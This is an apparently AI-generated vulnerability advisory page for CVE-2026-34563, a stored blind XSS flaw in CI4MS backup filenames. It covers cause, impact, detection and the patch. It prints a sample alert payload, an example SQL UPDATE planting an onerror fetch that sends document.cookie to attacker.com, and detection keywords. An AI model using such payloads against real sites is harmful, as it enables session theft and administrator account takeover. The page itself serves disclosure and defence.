
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34563 is a stored blind cross-site scripting (Blind XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, affecting all versions up to and including 0.28.6.0. The flaw resides in the backup management module, where user-controlled input in backup filenames is not properly sanitized before being stored and rendered in administrative views. It was published on March 31, 2026, and patched in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.9 (Critical) per the GitHub Advisory, and is classified under CWE-79 (Github Advisory, GitHub Security Advisory).
The root cause is improper neutralization of user-controlled input (CWE-79) in the backup upload and metadata processing pipeline. An attacker crafts a malicious SQL file (xss.sql) that, when uploaded via the backup upload functionality, uses SQL statements to insert a JavaScript payload into the backup filename field server-side — bypassing any client-side validation. The stored payload is subsequently rendered without HTML entity encoding in multiple backup management views (/backend/backup/upload, /backend/backup/, /backup/{id}), using unsafe DOM manipulation methods such as .html() or innerHTML. Because the payload executes only when a privileged user views the backup panel, this constitutes a Blind XSS scenario (Github Advisory, GitHub Security Advisory).
Successful exploitation allows an authenticated attacker with backup upload privileges to execute arbitrary JavaScript in the browsers of any user — including administrators — who views the backup management panel. This enables full account takeover across all roles, privilege escalation, theft of session tokens, unauthorized administrative actions, and complete compromise of the application. The scope change (S:C) in the CVSS vector reflects that the injected script executes in the context of other users' sessions, extending the blast radius well beyond the attacker's own account (Github Advisory, GitHub Security Advisory).
A proof-of-concept exploit with detailed reproduction steps is publicly available in the GitHub Security Advisory, including a video PoC hosted on Mega.nz. The advisory provides concrete steps (upload xss.sql, navigate to the backup panel, trigger XSS) and a sample payload (<img src=x onerror=alert(document.domain)>), making exploitation straightforward for any attacker with low-level authenticated access. The EPSS score is approximately 0.046–0.058% (18th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (Github Advisory, GitHub Security Advisory).
xss.sql containing SQL INSERT or UPDATE statements that write a JavaScript XSS payload into the backup filename field, e.g.:UPDATE backups SET filename = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>' WHERE id=1;/backend/backup/upload and upload xss.sql using the backup upload functionality./backend/backup/ or /backup/{id}, the unsanitized filename is rendered in the page, triggering the JavaScript payload in their browser.fetch() or XMLHttpRequest calls visible in browser developer tools or proxy logs./backend/backup/upload with .sql file uploads from non-administrative accounts; repeated access to /backend/backup/ or /backup/{id} endpoints shortly after an unusual upload event.<img, <script, onerror=, fetch(, document.cookie) rather than standard filename strings..sql files in the backup upload directory with filenames or contents containing JavaScript payloads.The vendor has released a patch in CI4MS version 0.31.0.0, which implements global input validation, enhanced CSRF token handling, and XSS protection across the application. Administrators should upgrade immediately by running composer update after backing up their database, as the release includes major structural changes including CodeIgniter Shield integration. As interim mitigations, restrict backup upload functionality to only the most trusted administrative accounts, implement a strict Content Security Policy (CSP) to block inline script execution, and set HttpOnly, SameSite, and Secure flags on session cookies to limit the impact of any successful XSS exploitation (Github Advisory, Release Notes).
The vulnerability received coverage from The Hacker Wire, which published an article specifically on the stored blind XSS via backup filename (The Hacker Wire). Social media discussion was observed on Mastodon and Bluesky shortly after disclosure. The vulnerability was also indexed by VulDB, CVEFeed, and the EU Vulnerability Database (EUVD-2026-18075), indicating broad community awareness. No major vendor statements beyond the GitHub advisory have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."